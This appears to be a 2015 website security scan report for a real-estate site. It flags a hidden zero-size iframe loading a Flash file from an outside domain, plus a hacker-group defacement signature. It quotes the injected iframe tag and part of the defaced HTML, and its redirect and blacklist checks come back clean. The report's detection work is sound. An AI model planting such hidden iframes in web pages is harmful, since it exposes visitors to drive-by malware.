Scanned pages/files
Request | Server response | Status |
http://omearthrealty.com/ | 200 OK Content-Length: 13274 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://syriab-bd.hak.su/tiger.swf <iframe width="0" height="0" src="http://syriab-bd.hak.su/tiger.swf" frameborder="0"> Deface/Content modification. The following signature was found: Hacked By :::WajdanButt::: | TeamLeets <html> <head> <meta http-equiv="Content-Language" content="en-us"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Hacked By :::WajdanButt::: | TeamLeets" name="description"/> <meta content="Hacked By :::WajdanButt:::| TeamLeets" name="keywords"/> <meta content="Hacked By :::WajdanButt:::| TeamLeets" name="Abstract"/> <meta name="Hacked By :::WajdanButt:::| TeamLeets"/> <link rel="icon" href="http://fc02.deviantart.net/fs71/f/2012/146/d/8/anonymous_by_deiby_ybied-d515ebr.gif"> <title>Hacked By :::WajdanButt::: ...[15609 bytes skipped]... | ||
http://omearthrealty.com/test404page.js | 404 Not Found Content-Length: 4875 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omearthrealty.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Sun, 22 Feb 2015 09:52:07 GMT
Accept-Ranges: bytes
ETag: "4c2924f59f16d01:0"
Server: Microsoft-IIS/8.0
Content-Length: 13274
Content-Type: text/html
Last-Modified: Sat, 13 Dec 2014 06:42:26 GMT
X-Powered-By: ASP.NET
...13274 bytes of data.
GET / HTTP/1.1
Host: omearthrealty.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Sun, 22 Feb 2015 09:52:07 GMT
Accept-Ranges: bytes
ETag: "4c2924f59f16d01:0"
Server: Microsoft-IIS/8.0
Content-Length: 13274
Content-Type: text/html
Last-Modified: Sat, 13 Dec 2014 06:42:26 GMT
X-Powered-By: ASP.NET
...13274 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: omearthrealty.com
Referer: http://www.google.com/search?q=omearthrealty.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omearthrealty.com
Referer: http://www.google.com/search?q=omearthrealty.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omearthrealty.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://omearthrealty.com/
Result: omearthrealty.com is not infected or malware details are not published yet.
Result: omearthrealty.com is not infected or malware details are not published yet.